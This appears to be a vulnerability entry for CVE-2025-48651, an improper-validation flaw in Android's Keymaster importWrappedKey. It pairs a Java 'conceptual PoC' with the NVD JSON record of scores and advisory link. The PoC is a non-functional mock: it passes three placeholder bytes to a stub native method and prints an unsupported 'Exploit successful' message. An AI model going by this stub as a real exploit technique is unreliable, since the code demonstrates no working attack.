CVE-2025-48651

// Conceptual PoC for CVE-2025-48651 // This code simulates the interaction with the vulnerable Keymaster Applet import android.security.keymaster.KeymasterException; import android.security.keymaster.KeymasterArguments; import android.security.keymaster.KeymasterBlob; public class VulnerableKeymasterExploit { public void exploitImportWrappedKey() { try { // Prepare arguments for the importWrappedKey call KeymasterArguments args = new KeymasterArguments(); // Simulate a malformed or crafted key data blob // that bypasses the weak input validation in KMKeymasterApplet byte[] craftedKeyData = new byte[] {0x00, 0x01, 0x02}; // Malformed payload KeymasterBlob wrappedKey = new KeymasterBlob(craftedKeyData); // The vulnerable method does not validate 'wrappedKey' strictly enough // allowing access to restricted keys. // In a real scenario, this would interact with the hardware keystore HAL. byte[] result = importWrappedKey(args, wrappedKey); System.out.println("Exploit successful. Leaked key data: " + result.toString()); } catch (KeymasterException e) { System.err.println("Exploit failed: " + e.getMessage()); } } // Mock method representing the vulnerable native/hal call private native byte[] importWrappedKey(KeymasterArguments args, KeymasterBlob wrappedKey) throws KeymasterException; }

{"cve": {"id": "CVE-2025-48651", "sourceIdentifier": "[email protected]", "published": "2026-04-06T19:16:25.867", "lastModified": "2026-04-13T21:16:23.373", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In importWrappedKey of KMKeymasterApplet.java, there is a possible way access keys that should be restricted due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://source.android.com/docs/security/bulletin/2026/2026-04-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}